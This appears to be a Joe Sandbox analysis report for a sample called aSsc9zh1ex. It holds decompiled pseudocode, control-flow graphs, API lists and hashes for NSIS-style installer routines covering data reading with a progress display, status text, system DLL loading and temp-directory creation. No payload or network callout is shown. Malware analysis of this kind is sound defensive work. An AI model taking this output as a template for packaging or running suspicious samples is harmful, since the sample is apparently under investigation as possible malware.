                                                                                                                              • Associated: 00000001.00000002.41962062973.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962107808.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962161287.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962210692.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962256309.00000000007B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962332064.00000000007D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_1_2_400000_aSsc9zh1ex.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                                                                              • String ID: C:\Users\user\AppData\Local\Temp\nso8B47.tmp$C:\Users\user\AppData\Local\Temp\nso8B47.tmp\System.dll$Call
                                                                                                                              • API String ID: 1941528284-1015037138
                                                                                                                              • Opcode ID: 12778993b973a10c22c4ece172c34c72592007db8cc4149c3b2bec960c285f91
                                                                                                                              • Instruction ID: 5ac910c5439316a1e26e23cc6d9244c071f0fb36d70bd55283583498c2888f83
                                                                                                                              • Opcode Fuzzy Hash: 12778993b973a10c22c4ece172c34c72592007db8cc4149c3b2bec960c285f91
                                                                                                                              • Instruction Fuzzy Hash: 9841A271900108BACF11BBB5DD85DAE3A79EF4536CB20423FF412B50E1DA3C8A519A6E
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 004032B4 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 161COMMON
                                                                                                                              Download Yara Rule

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 793 4032b4-4032cb 794 4032d4-4032dd 793->794 795 4032cd 793->795 796 4032e6-4032eb 794->796 797 4032df 794->797 795->794 798 4032fb-403308 call 4034ac 796->798 799 4032ed-4032f6 call 4034c2 796->799 797->796 803 40349a 798->803 804 40330e-403312 798->804 799->798 805 40349c-40349d 803->805 806 403445-403447 804->806 807 403318-40333e GetTickCount 804->807 810 4034a5-4034a9 805->810 808 403487-40348a 806->808 809 403449-40344c 806->809 811 4034a2 807->811 812 403344-40334c 807->812 813 40348c 808->813 814 40348f-403498 call 4034ac 808->814 809->811 815 40344e 809->815 811->810 816 403351-40335f call 4034ac 812->816 817 40334e 812->817 813->814 814->803 825 40349f 814->825 819 403451-403457 815->819 816->803 827 403365-40336e 816->827 817->816 822 403459 819->822 823 40345b-403469 call 4034ac 819->823 822->823 823->803 831 40346b-403470 call 4060bc 823->831 825->811 828 403374-403394 call 406a42 827->828 835 40339a-4033ad GetTickCount 828->835 836 40343d-40343f 828->836 834 403475-403477 831->834 837 403441-403443 834->837 838 403479-403483 834->838 839 4033f8-4033fa 835->839 840 4033af-4033b7 835->840 836->805 837->805 838->819 841 403485 838->841 844 403431-403435 839->844 845 4033fc-403400 839->845 842 4033b9-4033bd 840->842 843 4033bf-4033f0 MulDiv wsprintfW call 40557c 840->843 841->811 842->839 842->843 851 4033f5 843->851 844->812 846 40343b 844->846 848 403402-403409 call 4060bc 845->848 849 403417-403422 845->849 846->811 854 40340e-403410 848->854 850 403425-403429 849->850 850->828 853 40342f 850->853 851->839 853->811 854->837 855 403412-403415 854->855 855->850
                                                                                                                              C-Code - Quality: 95%
                                                                                                                              			E004032B4(int _a4, intOrPtr _a8, intOrPtr _a12, int _a16, signed char _a19) {
				signed int _v8;
				int _v12;
				intOrPtr _v16;
				long _v20;
				intOrPtr _v24;
				short _v152;
				void* _t65;
				void* _t69;
				long _t70;
				intOrPtr _t74;
				long _t75;
				intOrPtr _t76;
				void* _t77;
				int _t87;
				intOrPtr _t91;
				intOrPtr _t94;
				long _t95;
				signed int _t96;
				int _t97;
				int _t98;
				intOrPtr _t99;
				void* _t100;
				void* _t101;

				_t96 = _a16;
				_t91 = _a12;
				_v12 = _t96;
				if(_t91 == 0) {
					_v12 = 0x8000;
				}
				_v8 = _v8 & 0x00000000;
				_v16 = _t91;
				if(_t91 == 0) {
					_v16 = 0x797700;
				}
				_t62 = _a4;
				if(_a4 >= 0) {
					E004034C2( *0x7a8ab8 + _t62);
				}
				if(E004034AC( &_a16, 4) == 0) {
					L41:
					_push(0xfffffffd);
					goto L42;
				} else {
					if((_a19 & 0x00000080) == 0) {
						if(_t91 != 0) {
							if(_a16 < _t96) {
								_t96 = _a16;
							}
							if(E004034AC(_t91, _t96) != 0) {
								_v8 = _t96;
								L44:
								return _v8;
							} else {
								goto L41;
							}
						}
						if(_a16 <= _t91) {
							goto L44;
						}
						_t87 = _v12;
						while(1) {
							_t97 = _a16;
							if(_a16 >= _t87) {
								_t97 = _t87;
							}
							if(E004034AC(0x793700, _t97) == 0) {
								goto L41;
							}
							_t69 = E004060BC(_a8, 0x793700, _t97); // executed
							if(_t69 == 0) {
								L28:
								_push(0xfffffffe);
								L42:
								_pop(_t65);
								return _t65;
							}
							_v8 = _v8 + _t97;
							_a16 = _a16 - _t97;
							if(_a16 > 0) {
								continue;
							}
							goto L44;
						}
						goto L41;
					}
					_t70 = GetTickCount();
					 *0x40ce58 =  *0x40ce58 & 0x00000000;
					_t14 =  &_a16;
					 *_t14 = _a16 & 0x7fffffff;
					_v20 = _t70;
					 *0x40ce40 = 0xb;
					_a4 = _a16;
					if( *_t14 <= 0) {
						goto L44;
					} else {
						goto L9;
					}
					while(1) {
						L9:
						_t98 = 0x4000;
						if(_a16 < 0x4000) {
							_t98 = _a16;
						}
						if(E004034AC(0x793700, _t98) == 0) {
							goto L41;
						}
						_a16 = _a16 - _t98;
						 *0x40ce30 = 0x793700;
						 *0x40ce34 = _t98;
						while(1) {
							_t94 = _v16;
							 *0x40ce38 = _t94;
							 *0x40ce3c = _v12;
							_t74 = E00406A42(0x40ce30);
							_v24 = _t74;
							if(_t74 < 0) {
								break;
							}
							_t99 =  *0x40ce38; // 0x79bd28
							_t100 = _t99 - _t94;
							_t75 = GetTickCount();
							_t95 = _t75;
							if(( *0x7a8b14 & 0x00000001) != 0 && (_t75 - _v20 > 0xc8 || _a16 == 0)) {
								wsprintfW( &_v152, L"... %d%%", MulDiv(_a4 - _a16, 0x64, _a4));
								_t101 = _t101 + 0xc;
								E0040557C(0,  &_v152); // executed
								_v20 = _t95;
							}
							if(_t100 == 0) {
								if(_a16 > 0) {
									goto L9;
								}
								goto L44;
							} else {
								if(_a12 != 0) {
									_t76 =  *0x40ce38; // 0x79bd28
									_v8 = _v8 + _t100;
									_v12 = _v12 - _t100;
									_v16 = _t76;
									L23:
									if(_v24 != 4) {
										continue;
									}
									goto L44;
								}
								_t77 = E004060BC(_a8, _v16, _t100); // executed
								if(_t77 == 0) {
									goto L28;
								}
								_v8 = _v8 + _t100;
								goto L23;
							}
						}
						_push(0xfffffffc);
						goto L42;
					}
					goto L41;
				}
			}


























                                                                                                                              0x004032bf
                                                                                                                              0x004032c3
                                                                                                                              0x004032c6
                                                                                                                              0x004032cb
                                                                                                                              0x004032cd
                                                                                                                              0x004032cd
                                                                                                                              0x004032d4
                                                                                                                              0x004032d8
                                                                                                                              0x004032dd
                                                                                                                              0x004032df
                                                                                                                              0x004032df
                                                                                                                              0x004032e6
                                                                                                                              0x004032eb
                                                                                                                              0x004032f6
                                                                                                                              0x004032f6
                                                                                                                              0x00403308
                                                                                                                              0x0040349a
                                                                                                                              0x0040349a
                                                                                                                              0x00000000
                                                                                                                              0x0040330e
                                                                                                                              0x00403312
                                                                                                                              0x00403447
                                                                                                                              0x0040348a
                                                                                                                              0x0040348c
                                                                                                                              0x0040348c
                                                                                                                              0x00403498
                                                                                                                              0x0040349f
                                                                                                                              0x004034a2
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00403498
                                                                                                                              0x0040344c
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x0040344e
                                                                                                                              0x00403451
                                                                                                                              0x00403454
                                                                                                                              0x00403457
                                                                                                                              0x00403459
                                                                                                                              0x00403459
                                                                                                                              0x00403469
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00403470
                                                                                                                              0x00403477
                                                                                                                              0x00403441
                                                                                                                              0x00403441
                                                                                                                              0x0040349c
                                                                                                                              0x0040349c
                                                                                                                              0x00000000
                                                                                                                              0x0040349c
                                                                                                                              0x00403479
                                                                                                                              0x0040347c
                                                                                                                              0x00403483
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00403485
                                                                                                                              0x00000000
                                                                                                                              0x00403451
                                                                                                                              0x0040331e
                                                                                                                              0x00403320
                                                                                                                              0x00403327
                                                                                                                              0x00403327
                                                                                                                              0x0040332e
                                                                                                                              0x00403334
                                                                                                                              0x0040333b
                                                                                                                              0x0040333e
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00403344
                                                                                                                              0x00403344
                                                                                                                              0x00403344
                                                                                                                              0x0040334c
                                                                                                                              0x0040334e
                                                                                                                              0x0040334e
                                                                                                                              0x0040335f
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00403365
                                                                                                                              0x00403368
                                                                                                                              0x0040336e
                                                                                                                              0x00403374
                                                                                                                              0x00403374
                                                                                                                              0x0040337f
                                                                                                                              0x00403385
                                                                                                                              0x0040338a
                                                                                                                              0x00403391
                                                                                                                              0x00403394
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x0040339a
                                                                                                                              0x004033a0
                                                                                                                              0x004033a2
                                                                                                                              0x004033ab
                                                                                                                              0x004033ad
                                                                                                                              0x004033de
                                                                                                                              0x004033e4
                                                                                                                              0x004033f0
                                                                                                                              0x004033f5
                                                                                                                              0x004033f5
                                                                                                                              0x004033fa
                                                                                                                              0x00403435
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x004033fc
                                                                                                                              0x00403400
                                                                                                                              0x00403417
                                                                                                                              0x0040341c
                                                                                                                              0x0040341f
                                                                                                                              0x00403422
                                                                                                                              0x00403425
                                                                                                                              0x00403429
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x0040342f
                                                                                                                              0x00403409
                                                                                                                              0x00403410
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00403412
                                                                                                                              0x00000000
                                                                                                                              0x00403412
                                                                                                                              0x004033fa
                                                                                                                              0x0040343d
                                                                                                                              0x00000000
                                                                                                                              0x0040343d
                                                                                                                              0x00000000
                                                                                                                              0x00403344

                                                                                                                              APIs
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.41959952306.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000001.00000002.41959904662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41960027525.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41960080093.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41961705865.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41961753112.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41961803590.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41961843116.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962021828.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962062973.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962107808.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962161287.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962210692.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962256309.00000000007B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962332064.00000000007D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_1_2_400000_aSsc9zh1ex.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: CountTick$wsprintf
                                                                                                                              • String ID: ... %d%%$Z8@
                                                                                                                              • API String ID: 551687249-843941321
                                                                                                                              • Opcode ID: 25d0c7491c7920abd27f2f6fef4c2f9f733347eed01cbf64b6988d1fc6eca9be
                                                                                                                              • Instruction ID: 2eef5f2140e491494c2db8857c7661a7403dfcbdcc622e4f150acafc5917097d
                                                                                                                              • Opcode Fuzzy Hash: 25d0c7491c7920abd27f2f6fef4c2f9f733347eed01cbf64b6988d1fc6eca9be
                                                                                                                              • Instruction Fuzzy Hash: 59516C71800219EBDB11DF55DA84B9E7FB8AF40326F14417BE814BA2C1D7789F408BAA
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0040557C Relevance: 10.6, APIs: 7, Instructions: 72stringwindowCOMMON
                                                                                                                              Download Yara Rule

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 856 40557c-405591 857 405597-4055a8 856->857 858 405648-40564c 856->858 859 4055b3-4055bf lstrlenW 857->859 860 4055aa-4055ae call 406557 857->860 862 4055c1-4055d1 lstrlenW 859->862 863 4055dc-4055e0 859->863 860->859 862->858 864 4055d3-4055d7 lstrcatW 862->864 865 4055e2-4055e9 SetWindowTextW 863->865 866 4055ef-4055f3 863->866 864->863 865->866 867 4055f5-405637 SendMessageW * 3 866->867 868 405639-40563b 866->868 867->868 868->858 869 40563d-405640 868->869 869->858
                                                                                                                              C-Code - Quality: 100%
                                                                                                                              			E0040557C(signed int _a4, WCHAR* _a8) {
				struct HWND__* _v8;
				signed int _v12;
				WCHAR* _v32;
				long _v44;
				int _v48;
				void* _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				WCHAR* _t27;
				signed int _t28;
				long _t29;
				signed int _t37;
				signed int _t38;

				_t27 =  *0x7a7a44;
				_v8 = _t27;
				if(_t27 != 0) {
					_t37 =  *0x7a8b14;
					_v12 = _t37;
					_t38 = _t37 & 0x00000001;
					if(_t38 == 0) {
						E00406557(_t38, 0, 0x7a0f28, 0x7a0f28, _a4);
					}
					_t27 = lstrlenW(0x7a0f28);
					_a4 = _t27;
					if(_a8 == 0) {
						L6:
						if((_v12 & 0x00000004) == 0) {
							_t27 = SetWindowTextW( *0x7a7a28, 0x7a0f28); // executed
						}
						if((_v12 & 0x00000002) == 0) {
							_v32 = 0x7a0f28;
							_v52 = 1;
							_t29 = SendMessageW(_v8, 0x1004, 0, 0); // executed
							_v44 = 0;
							_v48 = _t29 - _t38;
							SendMessageW(_v8, 0x104d - _t38, 0,  &_v52); // executed
							_t27 = SendMessageW(_v8, 0x1013, _v48, 0); // executed
						}
						if(_t38 != 0) {
							_t28 = _a4;
							0x7a0f28[_t28] = 0;
							return _t28;
						}
					} else {
						_t27 = lstrlenW(_a8) + _a4;
						if(_t27 < 0x1000) {
							_t27 = lstrcatW(0x7a0f28, _a8);
							goto L6;
						}
					}
				}
				return _t27;
			}

















                                                                                                                              0x00405582
                                                                                                                              0x0040558c
                                                                                                                              0x00405591
                                                                                                                              0x00405597
                                                                                                                              0x004055a2
                                                                                                                              0x004055a5
                                                                                                                              0x004055a8
                                                                                                                              0x004055ae
                                                                                                                              0x004055ae
                                                                                                                              0x004055b4
                                                                                                                              0x004055bc
                                                                                                                              0x004055bf
                                                                                                                              0x004055dc
                                                                                                                              0x004055e0
                                                                                                                              0x004055e9
                                                                                                                              0x004055e9
                                                                                                                              0x004055f3
                                                                                                                              0x004055fc
                                                                                                                              0x00405608
                                                                                                                              0x0040560f
                                                                                                                              0x00405613
                                                                                                                              0x00405616
                                                                                                                              0x00405629
                                                                                                                              0x00405637
                                                                                                                              0x00405637
                                                                                                                              0x0040563b
                                                                                                                              0x0040563d
                                                                                                                              0x00405640
                                                                                                                              0x00000000
                                                                                                                              0x00405640
                                                                                                                              0x004055c1
                                                                                                                              0x004055c9
                                                                                                                              0x004055d1
                                                                                                                              0x004055d7
                                                                                                                              0x00000000
                                                                                                                              0x004055d7
                                                                                                                              0x004055d1
                                                                                                                              0x004055bf
                                                                                                                              0x0040564c

                                                                                                                              APIs
                                                                                                                              • lstrlenW.KERNEL32(007A0F28,00000000,0079BD28,76D723A0,?,?,?,?,?,?,?,?,?,004033F5,00000000,?), ref: 004055B4
                                                                                                                              • lstrlenW.KERNEL32(004033F5,007A0F28,00000000,0079BD28,76D723A0,?,?,?,?,?,?,?,?,?,004033F5,00000000), ref: 004055C4
                                                                                                                              • lstrcatW.KERNEL32(007A0F28,004033F5), ref: 004055D7
                                                                                                                              • SetWindowTextW.USER32(007A0F28,007A0F28), ref: 004055E9
                                                                                                                              • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040560F
                                                                                                                              • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405629
                                                                                                                              • SendMessageW.USER32(?,00001013,?,00000000), ref: 00405637
                                                                                                                                • Part of subcall function 00406557: lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 004066FC
                                                                                                                                • Part of subcall function 00406557: lstrlenW.KERNEL32(Call,00000000,007A0F28,?,004055B3,007A0F28,00000000), ref: 00406756
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.41959952306.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000001.00000002.41959904662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41960027525.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41960080093.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41961705865.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41961753112.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41961803590.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41961843116.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962021828.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962062973.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962107808.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962161287.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962210692.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962256309.00000000007B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962332064.00000000007D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_1_2_400000_aSsc9zh1ex.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: MessageSendlstrlen$lstrcat$TextWindow
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1495540970-0
                                                                                                                              • Opcode ID: 4220885725f682886bacb0d0991f91d3f85cd1758724983fd30707fe453943de
                                                                                                                              • Instruction ID: aa9a416d1108715588902b7fd38edda494bf3b6dcc64e7638c7e5b3a5377cb21
                                                                                                                              • Opcode Fuzzy Hash: 4220885725f682886bacb0d0991f91d3f85cd1758724983fd30707fe453943de
                                                                                                                              • Instruction Fuzzy Hash: F7218071900518BACF119F69ED449CFBF79EF49750F10803AF944B62A0C7794A40CFA8
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00406877 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36libraryCOMMON
                                                                                                                              Download Yara Rule

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 870 406877-406897 GetSystemDirectoryW 871 406899 870->871 872 40689b-40689d 870->872 871->872 873 4068ae-4068b0 872->873 874 40689f-4068a8 872->874 875 4068b1-4068e4 wsprintfW LoadLibraryExW 873->875 874->873 876 4068aa-4068ac 874->876 876->875
                                                                                                                              C-Code - Quality: 100%
                                                                                                                              			E00406877(intOrPtr _a4) {
				short _v576;
				signed int _t13;
				struct HINSTANCE__* _t17;
				signed int _t19;
				void* _t24;

				_t13 = GetSystemDirectoryW( &_v576, 0x104);
				if(_t13 > 0x104) {
					_t13 = 0;
				}
				if(_t13 == 0 ||  *((short*)(_t24 + _t13 * 2 - 0x23e)) == 0x5c) {
					_t19 = 1;
				} else {
					_t19 = 0;
				}
				wsprintfW(_t24 + _t13 * 2 - 0x23c, L"%s%S.dll", 0x40a014 + _t19 * 2, _a4);
				_t17 = LoadLibraryExW( &_v576, 0, 8); // executed
				return _t17;
			}








                                                                                                                              0x0040688e
                                                                                                                              0x00406897
                                                                                                                              0x00406899
                                                                                                                              0x00406899
                                                                                                                              0x0040689d
                                                                                                                              0x004068b0
                                                                                                                              0x004068aa
                                                                                                                              0x004068aa
                                                                                                                              0x004068aa
                                                                                                                              0x004068c9
                                                                                                                              0x004068dd
                                                                                                                              0x004068e4

                                                                                                                              APIs
                                                                                                                              • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 0040688E
                                                                                                                              • wsprintfW.USER32 ref: 004068C9
                                                                                                                              • LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 004068DD
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.41959952306.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000001.00000002.41959904662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41960027525.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41960080093.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41961705865.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41961753112.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41961803590.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41961843116.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962021828.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962062973.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962107808.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962161287.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962210692.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962256309.00000000007B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962332064.00000000007D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_1_2_400000_aSsc9zh1ex.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                                                                              • String ID: %s%S.dll$UXTHEME$\
                                                                                                                              • API String ID: 2200240437-1946221925
                                                                                                                              • Opcode ID: 70474fd7a4f9c0ba06a591290262a653731ba096fd3a0e6ffa6d52d828e9795f
                                                                                                                              • Instruction ID: cdb972a85fe13f574061c7118b8c5d4b466341d866a79bb5796beb4354b5a6e3
                                                                                                                              • Opcode Fuzzy Hash: 70474fd7a4f9c0ba06a591290262a653731ba096fd3a0e6ffa6d52d828e9795f
                                                                                                                              • Instruction Fuzzy Hash: E9F0F671511119A7DF10BB64DD0DF9B376CAF00305F11447AAA46F10E0EB7CDA68CBA8
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00405A4B Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 39COMMON
                                                                                                                              Download Yara Rule

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 877 405a4b-405a96 CreateDirectoryW 878 405a98-405a9a 877->878 879 405a9c-405aa9 GetLastError 877->879 880 405ac3-405ac5 878->880 879->880 881 405aab-405abf SetFileSecurityW 879->881 881->878 882 405ac1 GetLastError 881->882 882->880
                                                                                                                              C-Code - Quality: 100%
                                                                                                                              			E00405A4B(WCHAR* _a4) {
				struct _SECURITY_ATTRIBUTES _v16;
				struct _SECURITY_DESCRIPTOR _v36;
				int _t22;
				long _t23;

				_v36.Sbz1 = _v36.Sbz1 & 0x00000000;
				_v36.Owner = 0x4083f8;
				_v36.Group = 0x4083f8;
				_v36.Sacl = _v36.Sacl & 0x00000000;
				_v16.bInheritHandle = _v16.bInheritHandle & 0x00000000;
				_v16.lpSecurityDescriptor =  &_v36;
				_v36.Revision = 1;
				_v36.Control = 4;
				_v36.Dacl = 0x4083e8;
				_v16.nLength = 0xc;
				_t22 = CreateDirectoryW(_a4,  &_v16); // executed
				if(_t22 != 0) {
					L1:
					return 0;
				}
				_t23 = GetLastError();
				if(_t23 == 0xb7) {
					if(SetFileSecurityW(_a4, 0x80000007,  &_v36) != 0) {
						goto L1;
					}
					return GetLastError();
				}
				return _t23;
			}







                                                                                                                              0x00405a56
                                                                                                                              0x00405a5a
                                                                                                                              0x00405a5d
                                                                                                                              0x00405a63
                                                                                                                              0x00405a67
                                                                                                                              0x00405a6b
                                                                                                                              0x00405a73
                                                                                                                              0x00405a7a
                                                                                                                              0x00405a80
                                                                                                                              0x00405a87
                                                                                                                              0x00405a8e
                                                                                                                              0x00405a96
                                                                                                                              0x00405a98
                                                                                                                              0x00000000
                                                                                                                              0x00405a98
                                                                                                                              0x00405aa2
                                                                                                                              0x00405aa9
                                                                                                                              0x00405abf
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00405ac1
                                                                                                                              0x00405ac5

                                                                                                                              APIs
                                                                                                                              • CreateDirectoryW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405A8E
                                                                                                                              • GetLastError.KERNEL32 ref: 00405AA2
                                                                                                                              • SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 00405AB7
                                                                                                                              • GetLastError.KERNEL32 ref: 00405AC1
                                                                                                                              Strings
                                                                                                                              • C:\Users\user\AppData\Local\Temp\, xrefs: 00405A71
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.41959952306.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000001.00000002.41959904662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41960027525.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41960080093.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41961705865.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41961753112.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41961803590.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41961843116.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962021828.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962062973.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962107808.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962161287.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962210692.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
